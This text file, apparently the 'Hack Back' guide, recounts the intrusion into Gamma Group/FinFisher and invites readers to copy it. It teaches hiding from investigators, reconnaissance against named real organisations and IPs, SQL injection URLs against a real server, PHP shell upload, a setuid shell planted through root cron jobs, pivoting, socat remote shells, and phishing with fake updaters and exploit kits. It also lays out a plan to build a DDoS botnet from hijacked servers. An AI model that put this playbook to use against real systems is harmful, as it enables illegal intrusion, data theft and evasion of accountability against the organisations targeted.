hacking_dit.txt 18 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407
  1. _ _ _ ____ _ _
  2. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  3. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  4. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  5. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  6. A DIY Guide for those without the patience to wait for whistleblowers
  7. --[ 1 ]-- Introduction
  8. I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
  9. it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
  10. it is, and to hopefully inform and inspire you to go out and hack shit. If you
  11. have no experience with programming or hacking, some of the text below might
  12. look like a foreign language. Check the resources section at the end to help you
  13. get started. And trust me, once you've learned the basics you'll realize this
  14. really is easier than filing a FOIA request.
  15. --[ 2 ]-- Staying Safe
  16. This is illegal, so you'll need to take same basic precautions:
  17. 1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
  18. 2) Inside the encrypted volume install Whonix [1]
  19. 3) (Optional) While just having everything go over Tor thanks to Whonix is
  20. probably sufficient, it's better to not use an internet connection connected
  21. to your name or address. A cantenna, aircrack, and reaver can come in handy
  22. here.
  23. [0] https://truecrypt.ch/downloads/
  24. [1] https://www.whonix.org/wiki/Download#Install_Whonix
  25. As long as you follow common sense like never do anything hacking related
  26. outside of Whonix, never do any of your normal computer usage inside Whonix,
  27. never mention any information about your real life when talking with other
  28. hackers, and never brag about your illegal hacking exploits to friends in real
  29. life, then you can pretty much do whatever you want with no fear of being v&.
  30. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
  31. for some things like web browsing, when it comes to using hacking tools like
  32. nmap, sqlmap, and nikto that are making thousands of requests, they will run
  33. very slowly over Tor. Not to mention that you'll want a public IP address to
  34. receive connect back shells. I recommend using servers you've hacked or a VPS
  35. paid with bitcoin to hack from. That way only the low bandwidth text interface
  36. between you and the server is over Tor. All the commands you're running will
  37. have a nice fast connection to your target.
  38. --[ 3 ]-- Mapping out the target
  39. Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
  40. domain names, and reverse whois lookups to find all IP address space and domain
  41. names associated with an organization.
  42. [0] http://ha.ckers.org/fierce/
  43. For an example let's take Blackwater. We start out knowing their homepage is at
  44. academi.com. Running fierce.pl -dns academi.com we find the subdomains:
  45. 67.238.84.228 email.academi.com
  46. 67.238.84.242 extranet.academi.com
  47. 67.238.84.240 mail.academi.com
  48. 67.238.84.230 secure.academi.com
  49. 67.238.84.227 vault.academi.com
  50. 54.243.51.249 www.academi.com
  51. Now we do whois lookups and find the homepage of www.academi.com is hosted on
  52. Amazon Web Service, while the other IPs are in the range:
  53. NetRange: 67.238.84.224 - 67.238.84.255
  54. CIDR: 67.238.84.224/27
  55. CustName: Blackwater USA
  56. Address: 850 Puddin Ridge Rd
  57. Doing a whois lookup on academi.com reveals it's also registered to the same
  58. address, so we'll use that as a string to search with for the reverse whois
  59. lookups. As far as I know all the actual reverse whois lookup services cost
  60. money, so I just cheat with google:
  61. "850 Puddin Ridge Rd" inurl:ip-address-lookup
  62. "850 Puddin Ridge Rd" inurl:domaintools
  63. Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
  64. fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
  65. whois lookups and repeat the process until you've found everything.
  66. Also just google the organization and browse around its websites. For example on
  67. academi.com we find links to a careers portal, an online store, and an employee
  68. resources page, so now we have some more:
  69. 54.236.143.203 careers.academi.com
  70. 67.132.195.12 academiproshop.com
  71. 67.238.84.236 te.academi.com
  72. 67.238.84.238 property.academi.com
  73. 67.238.84.241 teams.academi.com
  74. If you repeat the whois lookups and such you'll find academiproshop.com seems to
  75. not be hosted or maintained by Blackwater, so scratch that off the list of
  76. interesting IPs/domains.
  77. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
  78. was simply a whois lookup of finfisher.com which found it registered to the name
  79. "FinFisher GmbH". Googling for:
  80. "FinFisher GmbH" inurl:domaintools
  81. finds gamma-international.de, which redirects to finsupport.finfisher.com
  82. ...so now you've got some idea how I map out a target.
  83. This is actually one of the most important parts, as the larger the attack
  84. surface that you are able to map out, the easier it will be to find a hole
  85. somewhere in it.
  86. --[ 4 ]-- Scanning & Exploiting
  87. Scan all the IP ranges you found with nmap to find all services running. Aside
  88. from a standard port scan, scanning for SNMP is underrated.
  89. Now for each service you find running:
  90. 1) Is it exposing something it shouldn't? Sometimes companies will have services
  91. running that require no authentication and just assume it's safe because the url
  92. or IP to access it isn't public. Maybe fierce found a git subdomain and you can
  93. go to git.companyname.come/gitweb/ and browse their source code.
  94. 2) Is it horribly misconfigured? Maybe they have an ftp server that allows
  95. anonymous read or write access to an important directory. Maybe they have a
  96. database server with a blank admin password (lol stratfor). Maybe their embedded
  97. devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
  98. default password.
  99. 3) Is it running an old version of software vulnerable to a public exploit?
  100. Webservers deserve their own category. For any webservers, including ones nmap
  101. will often find running on nonstandard ports, I usually:
  102. 1) Browse them. Especially on subdomains that fierce finds which aren't intended
  103. for public viewing like test.company.com or dev.company.com you'll often find
  104. interesting stuff just by looking at them.
  105. 2) Run nikto [0]. This will check for things like webserver/.svn/,
  106. webserver/backup/, webserver/phpinfo.php, and a few thousand other common
  107. mistakes and misconfigurations.
  108. 3) Identify what software is being used on the website. WhatWeb is useful [1]
  109. 4) Depending on what software the website is running, use more specific tools
  110. like wpscan [2], CMS-Explorer [3], and Joomscan [4].
  111. First try that against all services to see if any have a misconfiguration,
  112. publicly known vulnerability, or other easy way in. If not, it's time to move
  113. on to finding a new vulnerability:
  114. 5) Custom coded web apps are more fertile ground for bugs than large widely used
  115. projects, so try those first. I use ZAP [5], and some combination of its
  116. automated tests along with manually poking around with the help of its
  117. intercepting proxy.
  118. 6) For the non-custom software they're running, get a copy to look at. If it's
  119. free software you can just download it. If it's proprietary you can usually
  120. pirate it. If it's proprietary and obscure enough that you can't pirate it you
  121. can buy it (lame) or find other sites running the same software using google,
  122. find one that's easier to hack, and get a copy from them.
  123. [0] http://www.cirt.net/nikto2
  124. [1] http://www.morningstarsecurity.com/research/whatweb
  125. [2] http://wpscan.org/
  126. [3] https://code.google.com/p/cms-explorer/
  127. [4] http://sourceforge.net/projects/joomscan/
  128. [5] https://code.google.com/p/zaproxy/
  129. For finsupport.finfisher.com the process was:
  130. * Start nikto running in the background.
  131. * Visit the website. See nothing but a login page. Quickly check for sqli in the
  132. login form.
  133. * See if WhatWeb knows anything about what software the site is running.
  134. * WhatWeb doesn't recognize it, so the next question I want answered is if this
  135. is a custom website by Gamma, or if there are other websites using the same
  136. software.
  137. * I view the page source to find a URL I can search on (index.php isn't
  138. exactly unique to this software). I pick Scripts/scripts.js.php, and google:
  139. allinurl:"Scripts/scripts.js.php"
  140. * I find there's a handful of other sites using the same software, all coded by
  141. the same small webdesign firm. It looks like each site is custom coded but
  142. they share a lot of code. So I hack a couple of them to get a collection of
  143. code written by the webdesign firm.
  144. At this point I can see the news stories that journalists will write to drum
  145. up views: "In a sophisticated, multi-step attack, hackers first compromised a
  146. web design firm in order to acquire confidential data that would aid them in
  147. attacking Gamma Group..."
  148. But it's really quite easy, done almost on autopilot once you get the hang of
  149. it. It took all of a couple minutes to:
  150. * google allinurl:"Scripts/scripts.js.php" and find the other sites
  151. * Notice they're all sql injectable in the first url parameter I try.
  152. * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
  153. the option --tamper='tamper/modsecurityversioned.py'
  154. * Acquire the admin login information, login and upload a php shell [1] (the
  155. check for allowable file extensions was done client side in javascript), and
  156. download the website's source code.
  157. [0] http://sqlmap.org/
  158. [1] https://epinna.github.io/Weevely/
  159. Looking through the source code they might as well have named it Damn Vulnerable
  160. Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
  161. javascript, and if you're unauthenticated the admin page just sends you back to
  162. the login page with a Location header, but you can have your intercepting proxy
  163. filter the Location header out and access it just fine.
  164. [0] http://www.dvwa.co.uk/
  165. Heading back over to the finsupport site, the admin /BackOffice/ page returns
  166. 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
  167. sqli (it's nice to have a dozen options to choose from). The other sites by the
  168. web designer all had an injectable print.php, so some quick requests to:
  169. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
  170. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
  171. reveal that finsupport also has print.php and it is injectable. And it's
  172. database admin! For MySQL this means you can read and write files. It turns out
  173. the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
  174. But I can use a short script that uses sqlmap --file-read to get the php source
  175. for a URL, and a normal web request to get the HTML, and then finds files
  176. included or required in the php source, and finds php files linked in the HTML,
  177. to recursively download the source to the whole site.
  178. Looking through the source, I see customers can attach a file to their support
  179. tickets, and there's no check on the file extension. So I pick a username and
  180. password out of the customer database, create a support request with a php shell
  181. attached, and I'm in!
  182. --[ 5 ]-- (fail at) Escalating
  183. ___________
  184. < got r00t? >
  185. -----------
  186. \ ^__^
  187. \ (oo)\_______
  188. (__)\ )\/\
  189. ||----w |
  190. || ||
  191. ^^^^^^^^^^^^^^^^
  192. Root over 50% of linux servers you encounter in the wild with two easy scripts,
  193. Linux_Exploit_Suggester [0], and unix-privesc-check [1].
  194. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
  195. [1] https://code.google.com/p/unix-privesc-check/
  196. finsupport was running the latest version of Debian with no local root exploits,
  197. but unix-privesc-check returned:
  198. WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
  199. www-data can write to /etc/cron.hourly/mgmtlicensestatus
  200. WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
  201. can write to /etc/cron.hourly/webalizer
  202. so I add to /etc/cron.hourly/webalizer:
  203. chown root:root /path/to/my_setuid_shell
  204. chmod 04755 /path/to/my_setuid_shell
  205. wait an hour, and ....nothing. Turns out that while the cron process is running
  206. it doesn't seem to be actually running cron jobs. Looking in the webalizer
  207. directory shows it didn't update stats the previous month. Apparently after
  208. updating the timezone cron will sometimes run at the wrong time or sometimes not
  209. run at all and you need to restart cron after changing the timezone. ls -l
  210. /etc/localtime shows the timezone got updated June 6, the same time webalizer
  211. stopped recording stats, so that's probably the issue. At any rate, the only
  212. thing this server does is host the website, so I already have access to
  213. everything interesting on it. Root wouldn't get much of anything new, so I move
  214. on to the rest of the network.
  215. --[ 6 ]-- Pivoting
  216. The next step is to look around the local network of the box you hacked. This
  217. is pretty much the same as the first Scanning & Exploiting step, except that
  218. from behind the firewall many more interesting services will be exposed. A
  219. tarball containing a statically linked copy of nmap and all its scripts that you
  220. can upload and run on any box is very useful for this. The various nfs-* and
  221. especially smb-* scripts nmap has will be extremely useful.
  222. The only interesting thing I could get on finsupport's local network was another
  223. webserver serving up a folder called 'qateam' containing their mobile malware.
  224. --[ 7 ]-- Have Fun
  225. Once you're in their networks, the real fun starts. Just use your imagination.
  226. While I titled this a guide for wannabe whistleblowers, there's no reason to
  227. limit yourself to leaking documents. My original plan was to:
  228. 1) Hack Gamma and obtain a copy of the FinSpy server software
  229. 2) Find vulnerabilities in FinSpy server.
  230. 3) Scan the internet for, and hack, all FinSpy C&C servers.
  231. 4) Identify the groups running them.
  232. 5) Use the C&C server to upload and run a program on all targets telling them
  233. who was spying on them.
  234. 6) Use the C&C server to uninstall FinFisher on all targets.
  235. 7) Join the former C&C servers into a botnet to DDoS Gamma Group.
  236. It was only after failing to fully hack Gamma and ending up with some
  237. interesting documents but no copy of the FinSpy server software that I had to
  238. make due with the far less lulzy backup plan of leaking their stuff while
  239. mocking them on twitter.
  240. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
  241. already so I can move on to step 2!
  242. --[ 8 ]-- Other Methods
  243. The general method I outlined above of scan, find vulnerabilities, and exploit
  244. is just one way to hack, probably better suited to those with a background in
  245. programming. There's no one right way, and any method that works is as good as
  246. any other. The other main ways that I'll state without going into detail are:
  247. 1) Exploits in web browers, java, flash, or microsoft office, combined with
  248. emailing employees with a convincing message to get them to open the link or
  249. attachment, or hacking a web site frequented by the employees and adding the
  250. browser/java/flash exploit to that.
  251. This is the method used by most of the government hacking groups, but you don't
  252. need to be a government with millions to spend on 0day research or subscriptions
  253. to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
  254. for a couple thousand, and rent access to one for much less. There's also
  255. metasploit browser autopwn, but you'll probably have better luck with no
  256. exploits and a fake flash updater prompt.
  257. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
  258. of the time.
  259. The infosec industry invented a term to make this sound like some sort of
  260. science: "Social Engineering". This is probably the way to go if you don't know
  261. too much about computers, and it really is all it takes to be a successful
  262. hacker [0].
  263. [0] https://www.youtube.com/watch?v=DB6ywr9fngU
  264. --[ 9 ]-- Resources
  265. Links:
  266. * https://www.pentesterlab.com/exercises/
  267. * http://overthewire.org/wargames/
  268. * http://www.hackthissite.org/
  269. * http://smashthestack.org/
  270. * http://www.win.tue.nl/~aeb/linux/hh/hh.html
  271. * http://www.phrack.com/
  272. * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
  273. * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
  274. * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
  275. * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
  276. (all his other blog posts are great too)
  277. * https://www.corelan.be/ (start at Exploit writing tutorial part 1)
  278. * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
  279. One trick it leaves out is that on most systems the apache access log is
  280. readable only by root, but you can still include from /proc/self/fd/10 or
  281. whatever fd apache opened it as. It would also be more useful if it mentioned
  282. what versions of php the various tricks were fixed in.
  283. * http://www.dest-unreach.org/socat/
  284. Get usable reverse shells with a statically linked copy of socat to drop on
  285. your target and:
  286. target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
  287. host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
  288. It's also useful for setting up weird pivots and all kinds of other stuff.
  289. Books:
  290. * The Web Application Hacker's Handbook
  291. * Hacking: The Art of Exploitation
  292. * The Database Hacker's Handbook
  293. * The Art of Software Security Assessment
  294. * A Bug Hunter's Diary
  295. * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
  296. * TCP/IP Illustrated
  297. Aside from the hacking specific stuff almost anything useful to a system
  298. administrator for setting up and administering networks will also be useful for
  299. exploring them. This includes familiarity with the windows command prompt and unix
  300. shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
  301. networking, etc.
  302. --[ 10 ]-- Outro
  303. You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
  304. tool. It's not selling hacking tools that makes Gamma evil. It's who their
  305. customers are targeting and with what purpose that makes them evil. That's not
  306. to say that tools are inherently neutral. Hacking is an offensive tool. In the
  307. same way that guerrilla warfare makes it harder to occupy a country, whenever
  308. it's cheaper to attack than to defend it's harder to maintain illegitimate
  309. authority and inequality. So I wrote this to try to make hacking easier and more
  310. accessible. And I wanted to show that the Gamma Group hack really was nothing
  311. fancy, just standard sqli, and that you do have the ability to go out and take
  312. similar action.
  313. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
  314. Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
  315. hackers, dissidents, and criminals!